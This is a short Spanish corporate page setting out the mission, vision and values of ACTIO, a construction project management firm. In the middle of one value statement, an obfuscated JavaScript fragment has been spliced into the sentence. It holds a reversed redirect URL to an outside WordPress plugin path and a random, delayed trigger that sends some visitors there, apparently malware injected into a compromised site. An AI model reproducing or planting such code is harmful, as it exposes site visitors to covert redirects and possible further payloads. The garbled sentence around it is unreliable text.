Misión

Contribuir de manera relevante a la creación de valor para nuestros clientes en sus activos, proyectos e inversiones en construcción, permitiendo el crecimiento profesional constante de nuestro equipo humano.

 

Visión

Liderar el mercado por prestigio profesional y calidad de nuestros servicios.

 

Valores

Los valores corporativos en los que se sustenta la actividad de ACTIO son:

Independencia y ética profesional. ACTIO busca para nuestros clientes las mejores soluciones en el mercado de forma independiente y con alto compromiso de conducta ética.

Sostenibilidad, Seguridad y Calidad. Son valores transversales que se traducen en acciones específicas en los proyectos gestionados por ACTIO. Nuestro equipo debe garantizar en todos ellos un alto compromiso con el respeto al medio ambiente, la seguridad de quienes participan y la máxima calidad técnica y de gestión.

Orientación a la cultura de nuestros clientes. ACTIO entiende los objetivos de nuestros clientes como propios, adaptando el perfil de nuestro servicio y equipo hasta conseguir ser tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}una extensión del de nuestros clientes.

Excelencia profesional. El equipo humano de ACTIO busca permanentemente la implementación de las “best practices” del sector en sus servicios y métodos de trabajo.